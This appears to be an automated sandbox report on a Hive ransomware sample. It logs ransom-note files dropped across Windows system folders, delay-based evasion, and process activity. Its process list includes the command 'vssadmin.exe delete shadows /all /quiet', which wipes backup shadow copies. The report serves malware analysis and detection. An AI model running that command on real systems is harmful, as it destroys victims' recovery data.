File created C:\Windows\winsxs\amd64_netnvma.inf.resources_31bf3856ad364e35_6.1.7600.16385_it-it_5cd47ea41c470020\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-servicereportingapi_31bf3856ad364e35_6.1.7600.16385_none_6c7678cbda7098f8\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-i..l-keyboard-0000042c_31bf3856ad364e35_6.1.7600.16385_none_59634f5e6fa7d5d1\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-ie-feedsbs.resources_31bf3856ad364e35_8.0.7600.16385_ja-jp_edf96fb1262f5b5c\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\amd64_netfx35linq-system....dynamicdata.design_31bf3856ad364e35_6.1.7601.17514_none_f48e45c7055224f8\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\inf\.NET CLR Networking 4.0.0.0\000D\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\msil_microsoft.iis.power...provider.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_8f36c53b01dec296\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-mfdvdec_31bf3856ad364e35_6.1.7600.16385_none_64a6ece3617cfb74\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-r..lperclass.resources_31bf3856ad364e35_6.1.7600.16385_it-it_56ef5165204df522\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\msil_msbuild.resources_b03f5f7f11d50a3a_3.5.7600.16385_ja-jp_586fdad8bd134e99\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\x86_netfx-sbs_sys_data_dll_31bf3856ad364e35_6.1.7600.16385_none_fe6017304e1a4816\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\assembly\GAC_MSIL\System.XML.resources\2.0.0.0_es_b77a5c561934e089\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-ndisuio.resources_31bf3856ad364e35_6.1.7600.16385_es-es_f8133cc8594b3790\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\amd64_wcf-m_smsvchost_perf_c_ini_31bf3856ad364e35_6.1.7600.16385_none_902b82bc25e07ac6\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\msil_microsoft.grouppolicy.reporting_31bf3856ad364e35_6.1.7601.17514_none_4c14798809666596\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-blb-cli-main_31bf3856ad364e35_6.1.7600.16385_none_a749cec7a8b6bf08\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-help-mail.resources_31bf3856ad364e35_6.1.7600.16385_de-de_00ed58017fd687e8\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-shunimpl_31bf3856ad364e35_6.1.7601.17514_none_b3bc7baa4af52181\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-audio-mci_31bf3856ad364e35_6.1.7600.16385_none_1ce3af494d8b953d\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-ldap-client.resources_31bf3856ad364e35_6.1.7600.16385_de-de_32516987997ca2b8\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-ieframe.resources_31bf3856ad364e35_8.0.7600.16385_es-es_0640ddf35e8847b1\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-l..epremiumn.resources_31bf3856ad364e35_6.1.7601.17514_fr-fr_bc8aa7bd88265509\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-netplwiz.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_2dd66c79c7e4f8e2\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\msil_system.data.oracleclient.resources_b77a5c561934e089_6.1.7600.16385_it-it_e8dad23a13148696\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-m..fications.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_8b669fa14daef0eb\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-class_ss.resources_31bf3856ad364e35_6.1.7600.16385_en-us_9c43114bf49ad2c9\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-i..l-keyboard-0001040e_31bf3856ad364e35_6.1.7600.16385_none_fd64cf5361a6c8d6\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-s..ty-syskey.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_47ae60c666d2a843\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-i..tional-codepage-864_31bf3856ad364e35_6.1.7600.16385_none_cebf380cfc84b5bf\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-b..trics-cpl.resources_31bf3856ad364e35_6.1.7600.16385_it-it_296d0df052df9526\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-http-api.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_53ea200d3ef98f2e\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-powercfg.resources_31bf3856ad364e35_6.1.7600.16385_en-us_84ef507e8404018b\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-i..onal-codepage-28592_31bf3856ad364e35_6.1.7600.16385_none_b188802cfdb67997\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-previousversions-adm_31bf3856ad364e35_6.1.7600.16385_none_41d785d4f443b620\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-ie-behaviors.resources_31bf3856ad364e35_8.0.7600.16385_de-de_9916db26952fe7f2\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-i..ltinstall.resources_31bf3856ad364e35_6.1.7600.16385_de-de_07c23c1fe40f7920\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\amd64_security-malware-wi..er-events.resources_31bf3856ad364e35_6.1.7600.16385_en-us_dab3100a21f7543b\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-wininit.resources_31bf3856ad364e35_6.1.7600.16385_de-de_9c4b10f07cfccf53\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-wlanui.resources_31bf3856ad364e35_6.1.7600.16385_es-es_269cc1254400eed5\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\Microsoft.NET\assembly\GAC_MSIL\netstandard\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-c..r-name-ui.resources_31bf3856ad364e35_6.1.7600.16385_it-it_a2020e67811e5799\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-h..-iisbasic.resources_31bf3856ad364e35_6.1.7600.16385_de-de_230604a78e189958\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-mobsync.resources_31bf3856ad364e35_6.1.7600.16385_es-es_d761dac9339ff88c\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\amd64_prnrc004.inf_31bf3856ad364e35_6.1.7600.16385_none_21e7809d8e910def\Amd64\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\wow64_microsoft-windows-scripting-jscript_31bf3856ad364e35_11.2.9600.16428_none_6f8ba5f740934aae\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-i..tbranding.resources_31bf3856ad364e35_8.0.7600.16385_ja-jp_3f9f9ef99cdb9cde\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-directx-direct3d11_31bf3856ad364e35_7.1.7601.16492_none_3ef665796f74e084\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-netprofui.resources_31bf3856ad364e35_6.1.7600.16385_it-it_3cfdaed76b6ce5f9\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-tasklist.resources_31bf3856ad364e35_6.1.7600.16385_es-es_1c4d3cb94d962c50\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-h..centercpl.resources_31bf3856ad364e35_6.1.7600.16385_de-de_fdec13235c1fa8e5\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-o..s-service.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_56fb8cc6dcb2acfb\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-a..apc-layer.resources_31bf3856ad364e35_6.1.7600.16385_en-us_c5ccee6ea35066e8\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3020 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe C:\Windows\system32\cmd.exe
PID 3020 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe C:\Windows\system32\cmd.exe
PID 3020 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe C:\Windows\system32\cmd.exe
PID 3020 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe C:\Windows\system32\cmd.exe
PID 3020 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe C:\Windows\system32\cmd.exe
PID 3020 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe C:\Windows\system32\cmd.exe
PID 2568 wrote to memory of 2864 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 2864 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 2864 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2248 wrote to memory of 2868 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2248 wrote to memory of 2868 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2248 wrote to memory of 2868 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2568 wrote to memory of 2128 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 2128 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 2128 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 1656 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 1656 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 1656 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 1996 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 1996 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 1996 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 2332 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 2332 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 2332 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 2008 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 2008 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 2008 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 112 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 112 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 112 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 2240 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 2240 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 2240 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 324 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 324 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 324 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 1728 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 1728 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 1728 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 1788 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 1788 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 1788 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 2828 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 2828 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 2828 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 2620 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 2620 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 2620 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 1740 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 1740 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 1740 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 2480 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 2480 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 2480 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 2288 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 2288 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 2288 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 2948 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 2948 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 2948 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 2676 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 2676 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 2676 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 1208 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe"

C:\Windows\system32\cmd.exe

cmd /c hive.bat >NUL 2>NUL

C:\Windows\system32\cmd.exe

cmd /c shadow.bat >NUL 2>NUL

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

